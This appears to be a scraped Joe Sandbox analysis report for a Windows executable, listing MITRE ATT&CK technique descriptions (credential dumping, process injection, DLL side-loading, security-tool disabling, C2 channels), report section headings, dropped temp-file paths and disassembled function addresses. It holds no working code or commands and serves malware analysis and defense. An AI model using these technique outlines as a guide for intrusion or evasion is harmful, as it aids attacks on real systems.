Opcode ID: d203ec2980b39fedb4e74ec88f01b5e79c961abb564461495194c3d976353638
Instruction ID: 12c8894b687cd77540e063da763b804763b8d3f0765d018e47aad662f28bd1b2
Opcode Fuzzy Hash: d203ec2980b39fedb4e74ec88f01b5e79c961abb564461495194c3d976353638
Instruction Fuzzy Hash: 58D02232380304BBE264BB309C0FFE77E20BF00B50F054834B30EAA0E1C8E09800D650

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report J1VpshZJfm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\J14f8-3

C:\Users\user\AppData\Local\Temp\autC5A6.tmp

C:\Users\user\AppData\Local\Temp\reenlarge

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
J1VpshZJfm.exe

Function 00E93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00E949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00E94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00EF9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00E93015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00E93041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00E9708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00E93A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00E93633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00E93766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 018813B8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00E939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre